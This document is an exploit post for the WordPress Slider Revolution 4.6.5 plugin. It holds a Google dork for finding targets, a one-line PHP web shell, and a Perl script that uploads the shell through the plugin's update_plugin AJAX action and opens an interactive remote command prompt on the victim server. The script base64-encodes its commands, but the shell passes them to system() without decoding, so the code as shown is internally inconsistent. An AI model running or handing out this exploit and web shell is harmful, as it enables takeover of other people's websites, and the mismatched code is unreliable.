WordPress Slider Revolution plugin version 4.6.5 suffers from a remote shell upload vulnerability.
4e8cadbe4d270676c58df50959e60ad62c48e787dbed667844e8a8eda46f121a====================================================================================================================================
| # Title : WordPress - Slider Revolution 4.6.5 WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) |
| # Vendor : https://www.sliderrevolution.com/ |
| # Dork : index off revslider\backup |
====================================================================================================================================
[+] poc :
[+] Web shell upload :
The following perl exploit will attempt to load the HTTP php shell through the update_plugin function
To use the exploit, be sure to compress the backdoor file
Because the exploit uploads a compressed file to the target
[+] simple backdoor :
<?php
$cmd = $_GET['cmd'];
system($cmd);
?>
[+] Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension (indoushka.zip)
[+] The exploit and the backdoor must be in the same folder and path
[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine
[+] Perl exploit :
#!/usr/bin/perl
#
# Title :WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit
# Author :indoushka
# Vendor :https://www.sliderrevolution.com/
use LWP::UserAgent;
use MIME::Base64;
use strict;
sub banner {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print " ============[+] Author : indoushka[+]===================\n";
print "[+] Slider Revolution 4.6.5 shell upload 0-day exploit [+]\n";
print " ======================================================== \n";
print "[+] Uploading an web shell: [+]\n";
print "[+] The following perl exploit will attempt to load the [+]\n";
print "[+] HTTP php backdoor through the update_plugin function [+]\n";
print "[+] To use the exploit, make sure you compress the backdoor[+]\n";
print "============================================================== \n";
system('color a');
}
if (!defined ($ARGV[0] && $ARGV[1])) {
banner();
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
exit;
}
my $zip1 = "indoushka.zip";
unless (-e ($zip1))
{
banner();
print "[-] $zip1 not found! RTFM\n";
exit;
}
my $host = $ARGV[0];
my $plugin = $ARGV[1];
my $action;
my $update_file;
if ($plugin eq "revslider") {
$action = "revslider_ajax_action";
$update_file = "$zip1";
}
elsif ($plugin eq "showbiz") {
$action = "showbiz_ajax_action";
}
else {
banner();
print "[-] Wrong plugin name\n";
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
exit;
}
my $target = "wp-admin/admin-ajax.php";
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php";
sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
my $useragent = randomagent();
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$target");
unless ($status->is_success) {
banner();
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}
banner();
print "[*] Target set to $plugin\n";
print "[*] MorXploiting $host\n";
my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);
print "[*] Sent payload\n";
if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
print "[+] Payload successfully executed\n";
}
elsif ($exploit->decoded_content =~ /Wrong request/) {
print "[-] Payload failed: Not vulnerable\n";
exit;
}
elsif ($exploit->decoded_content =~ m/0$/) {
print "[-] Payload failed: Plugin unavailable\n";
exit;
}
else {
$exploit->decoded_content =~ /<\/b>(.*?)<br>/;
print "[-] Payload failed:$1\n";
print "[-] " . $exploit->decoded_content unless (defined $1);
print "\n";
exit;
}
print "[*] Checking if shell was uploaded\n";
sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }
my $rndstr = rndstr(8, 1..9, 'a'..'z');
my $cmd1 = encode_base64("echo $rndstr");
my $status = $ua->get("$host/$shell?cmd=$cmd1");
if ($status->decoded_content =~ /system\(\) has been disabled/) {
print "[-] Xploit failed: system() has been disabled\n";
exit;
}
elsif ($status->decoded_content !~ /$rndstr/) {
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}
elsif ($status->decoded_content =~ /$rndstr/) {
print "[+] Shell successfully uploaded\n";
}
my $cmd2 = encode_base64("whoami");
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");
my $cmd3 = encode_base64("uname -n");
my $uname = $ua->get("$host/$shell?cmd=$cmd3");
my $cmd4 = encode_base64("id");
my $id = $ua->get("$host/$shell?cmd=$cmd4");
my $cmd5 = encode_base64("uname -a");
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");
print $unamea->decoded_content;
print $id->decoded_content;
my $wa = $whoami->decoded_content;
my $un = $uname->decoded_content;
chomp($wa);
chomp($un);
while () {
print "\n$wa\@$un:~\$ ";
chomp(my $cmd=<STDIN>);
if ($cmd eq "exit")
{
print "Aurevoir!\n";
exit;
}
my $ucmd = encode_base64("$cmd");
my $output = $ua->get("$host/$shell?cmd=$ucmd");
print $output->decoded_content;
}
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |
|
=======================================================================================================================================